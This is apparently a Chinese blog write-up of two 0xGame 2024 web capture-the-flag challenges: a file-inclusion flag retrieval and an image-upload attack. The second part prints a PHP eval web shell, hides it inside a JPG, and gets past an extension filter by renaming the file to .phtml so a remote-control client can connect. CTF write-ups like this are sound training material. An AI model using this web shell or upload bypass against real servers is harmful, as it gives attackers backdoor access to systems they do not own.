0xGame 2024-Web-Week 2

[Week 2] hello_include

  • 进去后显示要查看源代码,尝试地址栏进入index.php发现没有区别
  • 进入index.phps看见源代码
  • 发现两个php文件
  • hello.php没有用,进入phpinfo.php文件
  • 进入后Ctrl+F搜索flag,找到flag所在地址
  • 返回原网页,能发现源代码存在POST
  • 发送f1Ie=/s3cr3t/f14g
  • 回显得到0xgame{4fdbe53f-53c0-4b04-966a-13fd3c9b9f2e}

[Week 2] picture

  • 图床可以上传图片马留作后门
  • 新建php文件<?php @eval($_POST['attack']);?>
  • 和一个jpg文件合并,可以用控制台,也可以直接16进制打开末尾添加
  • 然后上传,用BurpSuite抓包,修改请求包中文件后缀名
  • 这里猜测是有正则匹配,用来筛选后缀名中是否包含php
  • 所以将后缀名改为phtml
  • 然后将url复制到蚁剑,密码为attack
  • 成功连接
  • 到网站根目录浏览flag文件
  • 0xgame{fab7eb4b-7cba-49f9-b45c-29223be0a089}
暂无评论

发送评论 编辑评论

|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇